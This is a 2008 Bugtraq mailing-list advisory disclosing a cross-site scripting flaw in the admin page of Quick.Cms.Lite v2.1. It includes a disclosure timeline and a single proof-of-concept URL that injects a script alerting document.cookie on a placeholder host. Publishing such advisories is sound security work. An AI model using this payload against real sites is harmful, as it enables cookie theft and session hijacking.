[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CBFA581F3504499092542913E8B5E07B@techiese645ed2>
Date: Tue, 16 Sep 2008 22:15:16 +0100
From: "John Cobb" <johnc@...ytes.com>
To: <bugtraq@...urityfocus.com>
Subject: [NOBYTES.COM: #14] Quick.Cms.Lite v2.1 Freeware - Cross Site Scripting
Application: Quick.Cms.Lite v2.1 Freeware
Authors Site: http://opensolution.org/quick.cms,en,10.html
+--------------------------------------------------------------+
XSS:
http://www.victim.com/admin.php?"><script>alert(document.cookie)</script><"
+-[Notes:]-----------------------------------------------------+
This only appears to work on Internet Explorer.
Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: 08/09/2008
Author(s) Fix: 16/09/2008
JohnC@...ytes.com
http://www.NoBytes.com
Powered by blists - more mailing lists